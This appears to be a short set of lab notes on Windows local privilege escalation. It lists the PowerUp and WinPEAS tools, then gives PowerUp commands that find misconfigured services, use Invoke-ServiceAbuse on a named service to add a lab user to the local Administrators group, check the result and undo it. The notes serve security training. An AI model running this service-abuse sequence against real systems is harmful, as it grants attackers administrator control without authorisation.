Skip to content

Local privesc

Tools

  • PowerUp: A PowerShell tool from the PowerTools suite designed to automate the identification of Windows misconfigurations that lead to Local Privilege Escalation (LPE).

  • WinPEAS: An extremely deep enumeration tool (available as .exe or .bat) that searches for privilege escalation vectors, stored credentials, and active sessions using a color-coded priority system.

  • Privesc: Short for "Privilege Escalation." The process of gaining higher-level permissions (e.g., Local Admin or SYSTEM) from a low-privileged user account

. C:\AD\Tools\PowerUp.ps1 

# Run all automated checks to find service, file, and registry vulnerabilities
Invoke-AllChecks 

# Abuse the identified service by changing its binPath to a command that elevates our user
Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\student544' -Verbose 

# Check if 'student544' is now a member of the local Administrators group
net localgroup Administrators 

# Log off to refresh the Access Token and activate the newly granted Administrator rights
logoff

# Cleanup: Remove the user from the Administrators group to restore original state (testing)
net localgroup Administrators dcorp\student544 /delete

prives1


prives2

WinPEAS